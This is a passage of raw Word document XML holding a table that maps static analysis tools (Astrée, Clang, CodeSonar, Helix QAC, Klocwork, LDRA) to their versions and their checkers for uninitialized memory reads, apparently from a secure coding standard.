                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DD906AE" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59E1FBE1" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D88C932" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="27251DCA" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5550972F" w14:textId="0E6631DE" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId123" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC4BAF9" w14:textId="1DCA451E" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09458E38" w14:textId="339B5F20" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>uninitialized-read</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6DB0D1" w14:textId="27465003" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="211BA7F0" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F49C62" w14:textId="54A0CA04" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId124" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Clang</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242038D0" w14:textId="4C30E720" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03305BE8" w14:textId="53244BDA" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>Wuninitialized</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>clang-analyzer-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>core.UndefinedBinaryOperatorResult</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71428CAC" w14:textId="46724513" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Does not catch all instances of this rule, such as uninitialized values read from heap-allocated memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="51E363AD" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D06598F" w14:textId="6ED7C054" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId125" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A6A5B5" w14:textId="4BB052B3" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2FD3AB" w14:textId="24DA8BA8" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.RPL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.MEM.UVAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D80277" w14:textId="18E4FB86" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Return pointer to local</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Uninitialized variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="4D86A168" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B73B286" w14:textId="239209BD" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId126" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40948DE1" w14:textId="348C6B22" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E13CA5B" w14:textId="09F6B82B" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DF726, DF2727, DF2728, DF2961, DF2962, DF2963, DF2966, DF2967, DF2968, DF2971, DF2972, DF2973, DF2976, DF2977, DF978</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7846C1D3" w14:textId="77777777" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="17261F85" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40EAE008" w14:textId="09C0D1DE" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId127" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA1772A" w14:textId="41C6D175" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06653B16" w14:textId="54479271" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.CTOR.MIGHT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.CTOR.MUST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.HEAP.MIGHT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.HEAP.MUST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.STACK.ARRAY.MIGHT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.STACK.ARRAY.MUST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.STACK.ARRAY.PARTIAL.MUST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.STACK.MIGHT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNINIT.STACK.MUST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="749870A3" w14:textId="58C9D91C" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="48727D08" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C9EDD0" w14:textId="529ADBC4" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId128" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19EDCAD1" w14:textId="77777777" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:divId w:val="289286503"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B51EED" w14:textId="528A7AE2" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C704630" w14:textId="25990A78" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>53 D, 69 D, 631 S, 652 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A415BFB" w14:textId="7B335350" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="21DC6877" w14:textId="77777777" w:rsidTr="00001F14">
